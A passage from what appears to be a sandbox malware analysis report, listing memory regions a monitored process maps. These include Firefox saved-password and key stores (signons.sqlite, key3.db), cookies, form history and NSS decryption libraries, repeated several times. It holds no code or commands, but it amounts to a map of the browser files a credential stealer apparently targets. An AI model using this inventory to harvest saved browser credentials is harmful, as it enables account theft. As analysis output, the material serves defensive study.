0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 4920 start_va = 0x3580000 end_va = 0x3f7ffff entry_point = 0x3580000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 4921 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 4922 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 4923 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 4924 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 4925 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 4926 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js") Region: id = 4927 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 4928 start_va = 0x74490000 end_va = 0x74644fff entry_point = 0x74490000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll") Region: id = 4929 start_va = 0x74e70000 end_va = 0x74ea1fff entry_point = 0x74e70000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 4930 start_va = 0x74e60000 end_va = 0x74e66fff entry_point = 0x74e60000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 4931 start_va = 0x74310000 end_va = 0x743cefff entry_point = 0x74310000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 4932 start_va = 0x74e30000 end_va = 0x74e51fff entry_point = 0x74e30000 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll") Region: id = 4933 start_va = 0x742a0000 end_va = 0x74308fff entry_point = 0x742a0000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\SysWOW64\\msvcp100.dll" (normalized: "c:\\windows\\syswow64\\msvcp100.dll") Region: id = 4934 start_va = 0x3580000 end_va = 0x36fffff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 4935 start_va = 0x3580000 end_va = 0x367ffff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 4936 start_va = 0x36f0000 end_va = 0x36fffff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 4937 start_va = 0x3700000 end_va = 0x37fffff entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 4938 start_va = 0x737d0000 end_va = 0x737f6fff entry_point = 0x737d0000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll") Region: id = 4939 start_va = 0x737b0000 end_va = 0x737c6fff entry_point = 0x737b0000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll") Region: id = 4940 start_va = 0x73760000 end_va = 0x737aefff entry_point = 0x73760000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll") Region: id = 4941 start_va = 0x2c00000 end_va = 0x2c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4942 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 4943 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "urlclassifierkey3.txt" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt") Region: id = 4944 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "webapps.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json") Region: id = 4945 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 4946 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "installtime20131025151332" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332") Region: id = 4947 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 4948 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 4949 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 4950 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 4951 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 4952 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 4953 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 4954 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 4955 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 4956 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 4957 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 4958 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 4959 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 4960 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 4961 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 4962 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 4963 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 4964 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 4965 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 4966 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 4967 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 4968 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 4969 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 4970 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 4971 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js") Region: id = 4972 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 4973 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 4974 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "urlclassifierkey3.txt" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt") Region: id = 4975 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "webapps.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json") Region: id = 4976 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 4977 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "profiles.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini") Region: id = 4978 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4979 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4980 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4981 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 4982 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 4983 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 4984 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 4985 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 4986 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 4987 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 4988 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 4989 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 4990 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 4991 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 4992 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 4993 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 4994 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 4995 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 4996 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 4997 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 4998 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 4999 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 5000 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 5001 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 5002 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 5003 start_va = 0x450000 end_va = 0x453fff 